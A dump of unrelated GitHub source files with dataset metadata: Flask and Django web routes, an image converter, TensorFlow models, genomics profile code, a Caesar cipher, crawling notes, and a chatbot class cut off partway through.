filtering\n\"\"\"\n@application.route('/countries/sw_lifs_gt/', methods=['GET'])\ndef countries_sw_lifs_gt(index):\n if index > 0.0:\n session = Session()\n # Query on the database according to the filters\n countries = session.query(Indicators.location, Indicators.country).filter(\n Indicators.indicator_code == 'SW_LIFS',\n Indicators.inequality_code == 'TOT',\n Indicators.value > index\n ).all()\n return jsonify(countries)\n else:\n message = {\n 'status': 400,\n 'message': 'Bad Request: The index is invalid! Please, select a value greater than 0',\n }\n resp = jsonify(message)\n resp.status_code = 400\n return resp\n\n\"\"\"\n Returns a custom message for 404 error\n --------------------------------------\n Parameters:\n None so far\n\"\"\"\n@application.errorhandler(404)\ndef not_found(error):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n }\n resp = jsonify(message)\n resp.status_code = 404\n return resp","repo_name":"mauriciolg90/aivo_test","sub_path":"app/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30525965372","text":"from PIL import Image\nimport os, glob\n\n# 说明: 对指定目录下,指定格式图片进行批量转换\n# 功能: 转 jpg, jpg2000, bmp\n# 过程: 进入指定目录, 选择图像, 选择转换格式, 设置压缩质量, 转换图片\n# 输出: 转换后的图像, 不覆盖原图, 保存在原图所在目录下的\n\nconvert2jpg = lambda img, q, outdir: img.save(outdir+os.path.splitext(img.filename)[0]+'_'+str(q)+'.jpg', quality=q)\nconvert2j2k = lambda img, q, outdir: img.save(outdir+os.path.splitext(img.filename)[0]+'_'\\\n +str(q)+'.j2k', quality_layers=[q], quality_mode=\"rates\")\nconvert2bmp = lambda img, outdir: img.save(outdir+os.path.splitext(img.filename)[0]+'.bmp')\n\n\ndef changeDir():\n while True:\n # 切换目录\n workdir = input('输入源图片文件所在目录: ')\n try:\n if len(workdir): os.chdir(workdir)\n print('工作目录为: %s'%os.getcwd())\n break\n except:\n print('目录有误...')\n\n\nbanner = '''********************\n图片格式转换-批量\n********************'''\nprint(banner)\nchangeDir()\n\nsrcFMT = input('输入原图片格式[bmp]: ')\nif len(srcFMT)==0: srcFMT='.bmp'\nif '.' 
not in srcFMT: srcFMT='.'+srcFMT\nsrcIMGs = glob.glob('*'+srcFMT)\n\ntoIMG=['.jpg', '.j2k', '.bmp']\ntip = '''----- 功能 -----\n[1] 转 jpg\n[2] 转 jpeg2000\n[3] 转 bmp\n[4] 退出程序\n输入数字(1-4)[1]: '''\nchoose = input(tip)\n# 默认转换格式\nif len(choose)==0: choose='1'\n# 输入检测\nif not choose.isdigit() or choose not in list('123'): exit()\n# 默认保存目录\ndesDIR = input('输入图片保存目录[%sDIR]: '%toIMG[int(choose)-1][1:])\nif len(desDIR)==0:\n desDIR='%sDIR'%toIMG[int(choose)-1][1:]+ os.path.sep\nelse:\n desDIR+=os.path.sep+'%sDIR'%toIMG[int(choose)-1][1:] + os.path.sep\n\ntry:\n os.listdir(desDIR)\nexcept:\n os.mkdir(desDIR)\n# 开始转换\nif choose == '1':\n qua = input('设置压缩质量(1-95)[80]: ')\n qua = 80 if len(qua)==0 else int(qua)\n for im in srcIMGs:\n convert2jpg(Image.open(im), qua, desDIR)\n print('convert %s to %s'%(im, os.path.splitext(im)[0]+toIMG[int(choose)-1]))\nelif choose=='2':\n rate = input('设置压缩倍数(2-100)[5]: ')\n rate = 5 if len(rate)==0 else int(rate)\n for im in srcIMGs:\n convert2j2k(Image.open(im), rate, desDIR)\n print('convert %s to %s'%(im, os.path.splitext(im)[0]+toIMG[int(choose)-1]))\nelif choose=='3':\n for im in srcIMGs:\n convert2bmp(Image.open(im), desDIR)\n print('convert %s to %s'%(im, os.path.splitext(im)[0]+toIMG[int(choose)-1]))\nprint('转换完毕...')\nos.system('pause')\n\n\n\n","repo_name":"supertab/gcode","sub_path":"tools/imageFMTConvert2.py","file_name":"imageFMTConvert2.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"45539113547","text":"\nimport tensorflow as tf\nimport lmbspecialops as sops\nimport numpy as np\ndef convrelu2(name,inputs, filters, kernel_size, stride, activation=None):\n\n tmp_y = tf.layers.conv2d(\n inputs=inputs,\n filters=filters,\n kernel_size=[kernel_size,1],\n strides=[stride,1],\n padding='same',\n name=name+'y',\n activation=activation\n )\n\n\n tmp_x = tf.layers.conv2d(\n inputs=tmp_y,\n filters=filters,\n kernel_size=[1,kernel_size],\n strides=[1,stride],\n padding='same',\n activation=activation,\n name=name+'x'\n )\n\n return tmp_x\n\ndef predict_final_image(inp):\n \"\"\"Generates a tensor for optical flow prediction\n \n inp: Tensor\n\n predict_confidence: bool\n If True the output tensor has 4 channels instead of 2.\n The last two channels are the x and y flow confidence.\n \"\"\"\n\n \n\n tmp = tf.layers.conv2d(\n inputs=inp,\n filters=24,\n kernel_size=3,\n strides=1,\n padding='same',\n name='conv1_pred',\n activation=myLeakyRelu\n )\n\n output = tf.layers.conv2d(\n inputs=tmp,\n filters=3,\n kernel_size=3,\n strides=1,\n padding='same',\n name='conv2_pred',\n activation=None\n )\n\n \n return output\ndef _refine(inp, num_outputs, upsampled_prediction=None, features_direct=None,name=None):\n \"\"\" Generates the concatenation of \n - the previous features used to compute the flow/depth\n - the upsampled previous flow/depth\n - the direct features that already have the correct resolution\n\n inp: Tensor\n The features that have been used before to compute flow/depth\n\n num_outputs: int \n number of outputs for the upconvolution of 'features'\n\n upsampled_prediction: Tensor\n The upsampled flow/depth prediction\n\n features_direct: Tensor\n The direct features which already have the spatial output resolution\n \"\"\"\n upsampled_features = tf.layers.conv2d_transpose(\n inputs=inp,\n filters=num_outputs,\n kernel_size=4,\n strides=2,\n padding='same',\n activation=myLeakyRelu,\n name=\"upconv\"\n )\n\n\n\n\n inputs = [upsampled_features, 
features_direct, upsampled_prediction]\n concat_inputs = [ x for x in inputs if not x is None ]\n\n return tf.concat(concat_inputs, axis=3)\n\ndef myLeakyRelu(x):\n \"\"\"Leaky ReLU with leak factor 0.1\"\"\"\n # return tf.maximum(0.1*x,x)\n return sops.leaky_relu(x, leak=0.2)\n\n\ndef create_network(input_image,gan_enabled=False):\n\n with tf.variable_scope('vae'):\n\n conv1 = convrelu2(name='conv1', inputs=input_image, filters=64, kernel_size=5, stride=2,activation=myLeakyRelu)\n\n if gan_enabled == True:\n conv1 = tf.layers.dropout(conv1)\n\n conv2 = convrelu2(name='conv2', inputs=conv1, filters=128, kernel_size=3, stride=2,activation=myLeakyRelu)\n\n if gan_enabled == True:\n conv2 = tf.layers.dropout(conv2)\n\n conv3 = convrelu2(name='conv3', inputs=conv2, filters=256, kernel_size=3, stride=2,activation=myLeakyRelu)\n\n if gan_enabled == True:\n conv3 = tf.layers.dropout(conv3)\n\n # conv4 = convrelu2(name='conv4', inputs=conv3, filters=128, kernel_size=2, stride=2,activation=myLeakyRelu)\n\n # if gan_enabled == True:\n # conv4 = tf.layers.dropout(conv4)\n\n # conv5 = convrelu2(name='conv5', inputs=conv4, filters=256, kernel_size=2, stride=2,activation=myLeakyRelu)\n\n # if gan_enabled == True:\n # conv5 = tf.layers.dropout(conv5)\n\n # conv6 = convrelu2(name='conv6', inputs=conv5, filters=256, kernel_size=2, stride=2,activation=myLeakyRelu)\n\n # if gan_enabled == True:\n # conv6 = tf.layers.dropout(conv6)\n\n # print(conv6)\n\n dense_slice_shape = conv3.get_shape().as_list()\n\n # dense_slice_shape[-1] = 96\n\n # units = 1\n # for i in range(1,len(dense_slice_shape)):\n # units *= dense_slice_shape[i]\n\n # dense5 = tf.layers.dense(\n # tf.contrib.layers.flatten(tf.slice(conv3, [0,0,0,0], dense_slice_shape)),\n # units=units,\n # activation=None,\n # name='dense5'\n # )\n print(conv3)\n dense5 = tf.contrib.layers.flatten(conv3)\n print(dense5)\n z = 2048\n\n\n # mean latent vector\n z_mu = tf.layers.dense(dense5,units=z)\n\n # variance latent vector\n z_sigma = tf.layers.dense(dense5,units=z)\n\n # normal distribution \n eps = tf.random_normal(shape=tf.shape(z_sigma),mean=0, stddev=1, dtype=tf.float32)\n\n # adding up mean, variance with fixed normal distribution\n z_latent = z_mu + (z_sigma * eps)\n\n full_units_layer = tf.contrib.layers.fully_connected(z_latent,dense_slice_shape[1]*dense_slice_shape[2]*dense_slice_shape[3])\n\n # reshape [4,100] to [4,1,1,100] to pass it to the conv_transpose\n reshaped_layer = tf.reshape(full_units_layer,[full_units_layer.get_shape().as_list()[0],8,8,256])\n\n w_init = tf.truncated_normal_initializer(stddev=0.02)\n b_init = tf.constant_initializer(0.0)\n\n\n # 1rd hidden layer\n deconv1 = tf.layers.conv2d_transpose(reshaped_layer, 256, [5, 5], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # lrelu1 = myLeakyRelu(tf.layers.batch_normalization(deconv1, training=True))\n if gan_enabled == True:\n deconv1 = tf.layers.dropout(deconv1)\n\n lrelu1 = myLeakyRelu(deconv1)\n\n # 2nd hidden layer\n deconv2 = tf.layers.conv2d_transpose(lrelu1, 128, [5, 5], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # lrelu2 = myLeakyRelu(tf.layers.batch_normalization(deconv2, training=True))\n if gan_enabled == True:\n deconv2 = tf.layers.dropout(deconv2)\n \n lrelu2 = myLeakyRelu(deconv2)\n\n # 3rd hidden layer\n deconv3 = tf.layers.conv2d_transpose(lrelu2, 32, [5, 5], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # lrelu3 = 
myLeakyRelu(tf.layers.batch_normalization(deconv3, training=True))\n if gan_enabled == True:\n deconv3 = tf.layers.dropout(deconv3)\n \n lrelu3 = myLeakyRelu(deconv3)\n\n # # 4rd hidden layer\n # deconv4 = tf.layers.conv2d_transpose(lrelu3, 128, [3, 3], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # # lrelu4 = myLeakyRelu(tf.layers.batch_normalization(deconv4, training=True))\n # if gan_enabled == True:\n # deconv4 = tf.layers.dropout(deconv4)\n \n # lrelu4 = myLeakyRelu(deconv4)\n\n # # 5rd hidden layer\n # deconv5 = tf.layers.conv2d_transpose(lrelu4, 128, [3, 3], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # # lrelu5 = myLeakyRelu(tf.layers.batch_normalization(deconv5, training=True))\n # if gan_enabled == True:\n # deconv5 = tf.layers.dropout(deconv5)\n \n # lrelu5 = myLeakyRelu(deconv5)\n\n # deconv6 = tf.layers.conv2d_transpose(lrelu5, 64, [3, 3], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # # lrelu6 = myLeakyRelu(tf.layers.batch_normalization(deconv6, training=True))\n # if gan_enabled == True:\n # deconv6 = tf.layers.dropout(deconv6)\n \n # lrelu6 = myLeakyRelu(deconv6)\n # lrelu6 = tf.nn.sigmoid(deconv6)\n\n prediction = predict_final_image(lrelu3)\n print(prediction)\n\n return prediction, z_mu, z_sigma, z_latent\n\n\n\ndef discriminator(input, is_train=True, reuse=False):\n with tf.variable_scope('discriminator') as scope:\n if reuse:\n scope.reuse_variables()\n\n conv0 = convrelu2(name='conv0', inputs=input, filters=32, kernel_size=5, stride=2,activation=None)\n # conv0 = tf.layers.batch_normalization(conv0,training=is_train)\n conv0 =myLeakyRelu(conv0)\n\n conv1 = convrelu2(name='conv1', inputs=conv0, filters=64, kernel_size=3, stride=2,activation=None)\n # conv1 = tf.layers.batch_normalization(conv1,training=is_train)\n conv1 =myLeakyRelu(conv1)\n\n conv2 = convrelu2(name='conv2', inputs=conv1, filters=128, kernel_size=3, stride=2,activation=None)\n # conv2 = tf.layers.batch_normalization(conv2,training=is_train)\n conv2 =myLeakyRelu(conv2)\n\n conv3 = convrelu2(name='conv3', inputs=conv2, filters=256, kernel_size=3, stride=2,activation=None)\n # conv3 = tf.layers.batch_normalization(conv3,training=is_train)\n conv3 =myLeakyRelu(conv3)\n\n conv4 = convrelu2(name='conv4', inputs=conv3, filters=512, kernel_size=3, stride=2,activation=None)\n # conv4 = tf.layers.batch_normalization(conv4,training=is_train)\n conv4 =myLeakyRelu(conv4)\n\n dim = int(np.prod(conv4.get_shape()[1:]))\n fc1 = tf.reshape(conv4, shape=[-1, dim], name='fc1')\n \n \n w2 = tf.get_variable('w2', shape=[fc1.shape[-1], 1], dtype=tf.float32,\n initializer=tf.truncated_normal_initializer(stddev=0.02))\n b2 = tf.get_variable('b2', shape=[1], dtype=tf.float32,\n initializer=tf.constant_initializer(0.0))\n\n # wgan just get rid of the sigmoid\n logits = tf.add(tf.matmul(fc1, w2), b2, name='logits')\n # dcgan\n acted_out = tf.nn.sigmoid(logits)\n\n # dcgan\n return acted_out, conv2 #, acted_out","repo_name":"mozi22/RainyDays","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15109457016","text":"import pandas as pd\nfrom bpnet.preproc import resize_interval\nfrom tqdm import tqdm\nimport numpy as np\nfrom collections import OrderedDict\n\nfrom bpnet.plot.profiles import extract_signal\nfrom bpnet.modisco.core import dfi2seqlets, resize_seqlets, 
resize_seqlets\nfrom bpnet.simulate import profile_sim_metrics\nfrom bpnet.stats import quantile_norm\n\n\ndef profile_split(profile, seqlets):\n \"\"\"Split the profile to counts and profile probabilities\n \"\"\"\n total_counts = profile.sum(axis=-1).sum(axis=-1)\n sort_idx = np.argsort(-total_counts)\n\n # probabilities\n p = profile[sort_idx] / profile[sort_idx].sum(axis=1, keepdims=True)\n\n # drop NA's\n notnan = ~np.any(np.any(np.isnan(p), axis=-1), axis=-1)\n total_counts = total_counts[sort_idx][notnan]\n p = p[notnan]\n\n seqlet_idx = np.array([s.seqname for s in seqlets])[notnan]\n return p, total_counts, seqlet_idx\n\n\ndef profile_features(seqlets, ref_seqlets, profile, profile_width=70):\n # tasks = list(profile)\n\n # resize\n seqlets = resize_seqlets(seqlets, profile_width, seqlen=profile.shape[1])\n seqlets_ref = resize_seqlets(ref_seqlets, profile_width, seqlen=profile.shape[1])\n\n # extract the profile\n seqlet_profile = extract_signal(profile, seqlets)\n seqlet_profile_ref = extract_signal(profile, seqlets_ref)\n\n # compute the average profile\n avg_profile = seqlet_profile_ref.mean(axis=0)\n\n metrics = pd.DataFrame([profile_sim_metrics(avg_profile, cp) for cp in seqlet_profile])\n metrics_ref = pd.DataFrame([profile_sim_metrics(avg_profile, cp) for cp in seqlet_profile_ref])\n\n assert len(metrics) == len(seqlets) # needs to be the same length\n return pd.DataFrame(OrderedDict([\n (\"profile_match\", metrics.simmetric_kl),\n (\"profile_match_p\", quantile_norm(metrics.simmetric_kl, metrics_ref.simmetric_kl)),\n (\"profile_counts\", metrics['counts']),\n (\"profile_counts_p\", quantile_norm(metrics['counts'], metrics_ref['counts'])),\n (\"profile_max\", metrics['max']),\n (\"profile_max_p\", quantile_norm(metrics['max'], metrics_ref['max'])),\n ]))\n\n\ndef annotate_profile(dfi, mr, profiles, profile_width=70, trim_frac=0.08):\n \"\"\"Append profile match columns to dfi\n \"\"\"\n dfi = dfi.copy()\n dfp_list = []\n for pattern in tqdm(dfi.pattern.unique()):\n for task in profiles:\n dfp = profile_features(dfi2seqlets(dfi[dfi.pattern == pattern]),\n ref_seqlets=mr._get_seqlets(pattern, trim_frac=trim_frac),\n profile=profiles[task],\n profile_width=profile_width)\n dfp.columns = [f'{task}/{c}' for c in dfp.columns] # prepend task\n dfp_list.append(dfp)\n return pd.concat(dfp_list + [dfi], axis=1)\n","repo_name":"kundajelab/bpnet","sub_path":"bpnet/modisco/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"54"} +{"seq_id":"36424971218","text":"print('Приветствую! 
Программа \"Шифр Цезаря\"')\n\n\ntext = input('Введите текст который необходимо преобразовать: ')\ndirection = input('Укажите направление (шифрование или дешифрование - ш/д): ')\nalph = input('Укажите язык вводимого собщения (английский/русский - а/р(кириллица)): ')\nstep = int(input('Укажите шаг сдвига (со сдвигом вправо): '))\n\nen_alph = ''.join([chr(i) for i in range(97, 123)])\nen_alph_cap = en_alph.upper()\nru_alph = ''.join([chr(i) for i in range(1072, 1104)])\nru_alph_cap = ru_alph.upper()\n\ndef cipher_en(step, text):\n cipher_txt = ''\n for i in range(len(text)):\n if text[i] in en_alph:\n ind = en_alph.find(text[i]) + step\n if ind > 25:\n ind -= 26\n cipher_txt += en_alph[ind]\n elif ind <= 25:\n cipher_txt += en_alph[ind]\n elif text[i] in en_alph_cap:\n ind = en_alph_cap.find(text[i]) + step\n if ind > 25:\n ind -= 26\n cipher_txt += en_alph_cap[ind]\n elif ind <= 25:\n cipher_txt += en_alph_cap[ind]\n else:\n cipher_txt += text[i]\n return cipher_txt \n\ndef cipher_ru(step, text):\n cipher_txt = ''\n for i in range(len(text)):\n if text[i] in ru_alph:\n ind = ru_alph.find(text[i]) + step\n if ind > 31:\n ind -= 32\n cipher_txt += ru_alph[ind]\n elif ind <= 31:\n cipher_txt += ru_alph[ind]\n elif text[i] in ru_alph_cap:\n ind = ru_alph_cap.find(text[i]) + step\n if ind > 31:\n ind -= 32\n cipher_txt += ru_alph_cap[ind]\n elif ind <= 31:\n cipher_txt += ru_alph_cap[ind]\n else:\n cipher_txt += text[i]\n return cipher_txt \n\ndef dciper_en(step, text):\n dcipher_txt = ''\n for i in range(len(text)):\n if text[i] in en_alph:\n ind = en_alph.find(text[i]) - step\n if ind < 0:\n ind += 26\n dcipher_txt += en_alph[ind]\n elif ind >= 0:\n dcipher_txt += en_alph[ind]\n elif text[i] in en_alph_cap:\n ind = en_alph_cap.find(text[i]) - step\n if ind < 0:\n ind += 26\n dcipher_txt += en_alph_cap[ind]\n elif ind >= 0:\n dcipher_txt += en_alph_cap[ind]\n else:\n dcipher_txt += text[i]\n return dcipher_txt \n\ndef dciper_ru(step, text):\n dcipher_txt = ''\n for i in range(len(text)):\n if text[i] in ru_alph:\n ind = ru_alph.find(text[i]) - step\n if ind < 0:\n ind += 32\n dcipher_txt += ru_alph[ind]\n elif ind >= 0:\n dcipher_txt += ru_alph[ind]\n elif text[i] in ru_alph_cap:\n ind = ru_alph_cap.find(text[i]) - step\n if ind < 0:\n ind += 32\n dcipher_txt += ru_alph_cap[ind]\n elif ind >= 0:\n dcipher_txt += ru_alph_cap[ind]\n else:\n dcipher_txt += text[i]\n return dcipher_txt \n\ndef output(alph, direction):\n if alph == 'а' and direction == 'ш':\n return cipher_en(step, text)\n elif alph == 'р' and direction == 'ш':\n return cipher_ru(step, text)\n elif alph == 'а' and direction == 'д':\n return dciper_en(step,text)\n elif alph == 'р' and direction == 'д':\n return dciper_ru(step,text)\n else:\n return 'Ошибка ввода!'\n\nprint(output(alph, direction))","repo_name":"jooorik/stepik-project","sub_path":"caesar's cipher.py","file_name":"caesar's cipher.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38003320655","text":"\n\nfrom django.urls import path\n\nfrom .views import (\n StatusAPIView,\n # StatusCreateAPIView,\n # StatusDetailAPIView,\n # StatusUpdateAPIView,\n # StatusDeleteAPIView\n)\n\nurlpatterns = [\n \n path('',StatusAPIView.as_view()),\n # path('/',StatusDetailAPIView.as_view()),\n 
\n]\n\n#/api/status\n#api/status/create\n#api/status/12/update\n#api/status/12/delete\n#api/status/12\n\n","repo_name":"SifatIbna/restapi-project","sub_path":"status/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71898238881","text":"# Crawling: 인터넷에 있는 정보를 자동으로 다운로드\n# aka parsing, spidering\n\n# BeautifulSoup (HTML parser), Requests, 구름IDE(ide.goorm.io)\n# $python index.py\n\n# pip install bs4\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\nwith urlopen('http:/en.wikipedia.org/wiki/Main_Page') as response:\n soup = BeautifulSoup(response, 'html.parser')\n for anchor in soup.find_all('a'):\n print(anchor.get('href','/'))\n\n# f12 개발자 화면, Beautifulsoup 공식문서\n# .select\n# soup.select(\"span.ah_k\") 를 선택하라는 뜻\n# .get_text()\n\nf = open(\"C:/doit/새파일.txt\", 'w')\nfor i in range(1, 11):\n f.write(i)\nf.close()\n\n# 이미지 주소: src\n\n# pip install google_images_download","repo_name":"biggymart/study","sub_path":"assignments/Beer_project/2_jocoding_selenium.py","file_name":"2_jocoding_selenium.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9605410294","text":"# encoding=utf-8\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import url_for\nfrom flask import redirect\nfrom flask import request\nimport qrc\napp = Flask(__name__)\n\n@app.route('/')#‘/'页面或路径\ndef index():\n return redirect(url_for('url'))\n\n@app.route('/url',methods=['GET','POST'])\ndef url():#默认请求方式为get\n #request中包含所有用户发起请求的信息\n if request.method == 'GET':\n return render_template('url.html')\n else:\n url = request.form['url']\n imgurl = qrc.url(url)\n return render_template('img.html',imgurl=imgurl)\n\n@app.route('/text',methods=['GET','POST'])\ndef text():\n if request.method == 'GET':\n return render_template('url.html')\n else:\n url = request.form['url']\n imgurl = qrc.url(url)\n return render_template('img.html',imgurl=imgurl)\nif __name__=='__main__':\n app.debug = True\n app.run()#app.run(debug=True)","repo_name":"xiaoloinzi/worksplace","sub_path":"GR1/python_1/webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6870081099","text":"\r\n# -*- coding: utf-8 -*-\r\n#\r\n# chatbot.py\r\n# \r\n# Copyright 2020 Dirgan \r\n# \r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n# \r\n# \r\n\r\nprint(\"Initializing Chatbot Library...\")\r\n\r\nimport pip\r\n\r\ndef installModule(package):\r\n if hasattr(pip, 'main'):\r\n pip.main(['install', package])\r\n else:\r\n pip._internal.main(['install', package])\r\n\r\ntry:\r\n\timport nltk\r\nexcept: \r\n\tinstallModule(\"nltk\")\r\n\timport nltk\r\n\r\ntry:\r\n\timport tensorflow\r\nexcept: \r\n\tinstallModule(\"tensorflow\")\r\nfinally:\r\n\timport tensorflow\r\n\r\ntry:\r\n\timport tflearn\r\nexcept: \r\n\tinstallModule(\"tflearn\")\r\nfinally:\r\n\timport tflearn\r\n\r\ntry:\r\n\timport numpy\r\nexcept: \r\n\tinstallModule(\"numpy\")\r\nfinally:\r\n\timport numpy\r\n\r\nimport random\r\nimport json\r\nimport pickle\r\nimport signal\r\nimport os\t\r\n\r\nfrom nltk.stem.lancaster import LancasterStemmer\r\n\r\n###########\r\n## C ##\r\n###########\r\nclass ltoChatbot():\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef __init__(self, botName = \"ltoChatbot\", corpusFile = \"ltoChatbotCorpus.json\", specialization=\"Specialized topic\", neurons=10, iterations = 1000, levels = 2, forceTraining=False):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\t\r\n\t\tself.tensorflowTrainFiles=(\"checkpoint\",\"ltoChatbot.pdata\", \"ltoChatBot.tflearn.data-00000-of-00001\", \"ltoChatBot.tflearn.index\", \"ltoChatBot.tflearn.meta\")\r\n\t\t\r\n\t\tself._modelOnDisk = \"ltoChatBot.tflearn\"\r\n\t\tself._dataOnDisk = \"ltoChatbot.pdata\"\r\n\t\tself._conversationOnDisk = \"ltoChatbotConversationCorpus.json\"\r\n\t\tself._botName = botName\r\n\t\tself._specialization = specialization\r\n\t\t\r\n\t\tself._corpusFile = corpusFile\r\n\t\tself._corpusData = None\r\n\t\t\r\n\t\tself._model = None\r\n\t\t\r\n\t\tself._stemmer = LancasterStemmer()\r\n\r\n\t\tself._words = []\r\n\t\tself._labels = []\r\n\t\tself._dx = []\r\n\t\tself._dy = []\r\n\t\t\r\n\t\tnltk.download('punkt')\t\r\n\r\n\t\tself._notKnownResponses = [\"I'm not quite sure what you are asking for... 
could you repeat your question?\",\r\n\t\t\t\t\t\t\t\t\"Don't understand your question, rephrase your question please!\",\r\n\t\t\t\t\t\t\t\t\"I got lost, could you please repeat what you are looking for?\",\r\n\t\t\t\t\t\t\t\t\"I think I don´t get you question, please ask again\",\r\n\t\t\t\t\t\t\t\t\"I am a specialized bot for responding on an specific topic, please ask something about %s\"%self._specialization]\r\n\r\n\t\tself.setup()\r\n\t\t\r\n\t\tself.train(force=forceTraining, neurons=neurons, trainingIterations = iterations, levels = levels)\r\n\t\t\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef setup(self):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\r\n\t\ttry:\r\n\t\t\twith open(self._corpusFile) as file:\r\n\t\t\t\tself._corpusData = json.load(file)\r\n\t\texcept:\r\n\t\t\tprint(\"ERROR: no Corpus was found!\")\r\n\t\t\texit(1)\r\n\r\n\t\ttry:\r\n\t\t\twith open(self._conversationOnDisk) as file:\r\n\t\t\t\t_conversationalData = json.load(file)\r\n\t\t\t\r\n\t\t\tself._corpusData[\"topics\"].extend(_conversationalData[\"topics\"])\r\n\t\texcept Exception as err:\r\n\t\t\tprint(\"ERROR: no Conversation Corpus was found, so the bot won't be polite!\")\t\t\r\n\r\n\t\ttry:\r\n\t\t\twith open(self._dataOnDisk, \"rb\") as f:\r\n\t\t\t\tself._words, self._labels, self._training, self._output = pickle.load(f)\r\n\t\t\tprint(\"Found data preprocessed on disk!\")\r\n\t\texcept:\r\n\t\t\tfor topic in self._corpusData[\"topics\"]:\r\n\t\t\t\tfor pattern in topic[\"patterns\"]:\r\n\t\t\t\t\twordsTokenized = nltk.word_tokenize(pattern)\r\n\t\t\t\t\twordsLowerized = [i.lower() for i in wordsTokenized if i!=\"?\"]\r\n\t\t\t\t\tself._words.extend(wordsLowerized)\r\n\t\t\t\t\tself._dx.append(wordsLowerized)\r\n\t\t\t\t\tself._dy.append(topic[\"tag\"].lower())\r\n\r\n\t\t\t\tif topic[\"tag\"].lower() not in self._labels:\r\n\t\t\t\t\tself._labels.append(topic[\"tag\"].lower())\r\n\r\n\t\t\tself._words = [self._stemmer.stem(w) for w in self._words if w != \"?\"]\r\n\t\t\t\r\n\t\t\tself._words = sorted(list(set(self._words)))\r\n\t\t\tself._labels = sorted(self._labels)\r\n\r\n\t\t\tself._training = []\r\n\t\t\tself._output = []\r\n\r\n\t\t\t_outEmpty = [0 for _ in range(len(self._labels))]\r\n\r\n\t\t\tfor index, dx in enumerate(self._dx):\r\n\t\t\t\t_bagOfWords = []\r\n\r\n\t\t\t\twrds = [self._stemmer.stem(w.lower()) for w in dx]\r\n\r\n\t\t\t\tfor w in self._words:\r\n\t\t\t\t\tif w in wrds:\r\n\t\t\t\t\t\t_bagOfWords.append(1)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t_bagOfWords.append(0)\r\n\r\n\t\t\t\t_outputRow = _outEmpty[:]\r\n\t\t\t\t_outputRow[self._labels.index(self._dy[index])] = 1\r\n\r\n\t\t\t\tself._training.append(_bagOfWords)\r\n\t\t\t\tself._output.append(_outputRow)\r\n\r\n\r\n\t\t\tself._training = numpy.array(self._training)\r\n\t\t\tself._output = numpy.array(self._output)\r\n\r\n\t\t\twith open(self._dataOnDisk, \"wb\") as f:\r\n\t\t\t\tpickle.dump((self._words, self._labels, self._training, self._output), f)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef trainingDataExists(self):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\texists = True\r\n\t\tfor tf in self.tensorflowTrainFiles:\r\n\t\t\ttry:\r\n\t\t\t\tif not os.path.exists(tf):\r\n\t\t\t\t\texists = 
False\r\n\t\t\t\t\tbreak\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(e)\r\n\t\t\t\t\r\n\t\treturn exists\r\n\t\t\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef removeTrainingData(self):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\tfor tf in self.tensorflowTrainFiles:\r\n\t\t\ttry:\r\n\t\t\t\tos.remove(tf)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(e)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef train(self, force = False, levels = 2, neurons = 10, trainingIterations = 1000, verbose = True):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\tif force:\r\n\t\t\tself.removeTrainingData()\r\n\t\telse:\t\r\n\t\t\tif not self.trainingDataExists():\r\n\t\t\t\tforce=True\r\n\r\n\t\ttensorflow.reset_default_graph()\r\n\r\n\t\t_net = tflearn.input_data(shape=[None, len(self._training[0])])\r\n\r\n\t\tfor i in range(levels): \r\n\t\t\t_net = tflearn.fully_connected(_net, neurons)\r\n\r\n\t\t_net = 